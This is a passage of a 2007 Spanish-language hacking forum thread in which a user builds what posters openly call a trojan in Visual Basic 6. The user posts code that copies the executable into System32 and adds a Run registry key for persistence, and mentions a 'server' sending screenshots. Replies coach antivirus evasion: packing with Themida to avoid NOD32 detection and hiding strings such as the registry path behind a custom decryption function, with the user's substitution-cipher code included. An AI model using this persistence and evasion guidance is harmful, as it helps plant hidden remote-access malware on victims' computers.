elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  copiar a system o system 32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: copiar a system o system 32  (Leído 12,050 veces)
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #10 en: 2 Mayo 2007, 22:06 pm »

Para lo de encriptacion de cadenas te dejo algo:

http://www.google.es/search?hl=es&client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hs=rQf&q=cifrar+cadenas+VB&btnG=B%C3%BAsqueda&meta=

http://foro.elhacker.net/index.php?topic=156434.0;prev_next=next

Citar
si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

Benru te a dado todo el codigo que necesitas.... :) :) Te lo recopilo un poquito:

En un modulo:

Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

En el formulario:

Código:
Dim system32 As String
Dim windows As String

Public Function RutaSystem32()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
   
Longitud = 128
   
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
system32 = Camino
End Function

Public Function RutaWindows()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
   
Longitud = 128
   
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
windows = Camino
End Function

Private Sub Form_Load()

RutaSystem32

MsgBox system32
End Sub

Un Saludo.



En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.006


Ver Perfil
Re: copiar a system o system 32
« Respuesta #11 en: 2 Mayo 2007, 22:07 pm »

Citar
si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

No, no es necesaria. Pero recuerda que tendras que modificar el codigo, quedaria asi:
Código:
Private Sub Form_Load()

    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim sys
   
    Longitud = 128
   
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    sys = Camino
End Sub

Saludos


En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #12 en: 2 Mayo 2007, 22:18 pm »

ok miren... lo de copiar a System32 tengo esto:

y funciana ;)

Modulo1
Código:
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Function System32() As String
    Dim buf As String
    Dim ret As Long
    buf = String$(260, Chr$(0))
    ret = GetSystemDirectory(buf, Len(buf))
    System32 = Left$(buf, ret)
End Function

Form
Código:
Private Sub Form_Load()
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub

hasta ahi anda barbaro... no salta el antivirus ni nada... ahora en el form le agregue para q se ejecute y quedo asi:

form
Código:
Dim clave As Object

Private Sub Form_Load()
On Error GoTo Error
Set clave = CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\prueba.exe"
Error:
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub

y si... es como dice Hendrix. me lo detecta el AV.. ahora leo esos manuales... y despues dejo el code final aqui por si alguien lo necesita ;)


para ser sincero no entendi lo de cifrar... es como sustituir la direccion por una variable???
« Última modificación: 2 Mayo 2007, 22:24 pm por vivachapas » En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #13 en: 2 Mayo 2007, 23:28 pm »

lo logreeeee bueno...

bueno les cuento lo puse como esta en el codigo anterior... y le pase el themida... y por lo menos el NOD32 no lo detecta...
pasa q me quedo re pesado ahora...

si me pudieran explicar bien como cifrar las cadenas xq no lo termine de enteder se los agradeceria muchisimo...


IGUALMENTE MUCHAS GRACIAS A TODOS!

toy feliz de este logro ;)
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: copiar a system o system 32
« Respuesta #14 en: 2 Mayo 2007, 23:33 pm »

Le pasaste el AV sin comprimir con Themida?? O ya te lo detectaba??

El Themida incrementa mucho el tamaño de un archivo, intenta conseguir un troyano indetectable sin necesidad de recurrir a esto ultimo

salu2
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #15 en: 2 Mayo 2007, 23:36 pm »

cuando compilaba el exe saltaba el AV :(

ahora q le pase el themida no lo detecta... pero es mas lento... por ejemplo para mandar los screenshot tarda un monton y eso q tienen resolucion baja (20)
« Última modificación: 3 Mayo 2007, 00:47 am por vivachapas » En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #16 en: 3 Mayo 2007, 22:26 pm »

ninguno me puede explicar bien como cifro las cadenas??

porfa... tengo el server q pesa muchisimo y mucho mas lento
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #17 en: 3 Mayo 2007, 23:37 pm »

Ya te lo dije, tienes que buscar alguna funcion que encripte una cadena de texto, luego buscas la que lo desencripte, abres un proyecto nuevo en VB, pones la funcion encriptadora y ahces que aparezca el resutlado del texto encritpado en el textbox, lo copias y lo pones en la funcion que quieres ejecutar, pasandole la funcion desencriptadora....algo asi:

Código:
Kill "C:\archivo.exe"

Encritpas esto: C:\Archivo.exe

te queda asi: hgd5b5td4b

luego, pones esto:

Código:
kill funciondesencriptadora("hgd5b5td4b")

lo que hace esto es pasarle al comando kill, el argumento ya desencritpado, es decir, C:\archivo.exe

Un Saludo.

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #18 en: 4 Mayo 2007, 00:16 am »

ahora entendi!! disculpen mi ignoracia!! XD

entonces lo q yo tengo q cifrar sera esto:

Código:
Clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\klass.exe"

y me quedaria algo asi:

Código:
Clave.regwrite funciondesencriptadora("djflsdflkasdf")
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #19 en: 4 Mayo 2007, 02:47 am »

huyyy... q hago mal!!... por favor les pido q miren este codigo q hice:


poner un text1   y en el text1.text = "####$$&&***%/***"
lo q es igual a "agus" una vez desencripado
Código:
Dim Des As String

Function descifrar(Ruta As String)
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
End Function

Private Sub Command1_Click()
Des = descifrar(Text1.Text)
Text1.Text = Des
End Sub

ahora si prueban el codigo cuando le hacen click al boton... el text1 se borra y no deja ningun resultado... q hago mal?
En línea

Páginas: 1 [2] 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Utilidad proceso SYSTEM
Windows
crazykenny 8 6,295 Último mensaje 27 Abril 2011, 23:10 pm
por Randomize
System.Xml.Linq y System.Core « 1 2 »
.NET (C#, VB.NET, ASP)
SγиtαxEяяoя 10 7,049 Último mensaje 23 Junio 2013, 23:50 pm
por Eleкtro
[PC]System Shock (2020)
Juegos y Consolas
luiti 0 1,586 Último mensaje 26 Septiembre 2020, 17:54 pm
por luiti
System.Net métodos
.NET (C#, VB.NET, ASP)
Beginner Web 0 1,744 Último mensaje 6 Noviembre 2020, 23:33 pm
por Beginner Web
System Informer
Software
B€T€B€ 1 3,383 Último mensaje 13 Marzo 2023, 02:11 am
por ThunderCls
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines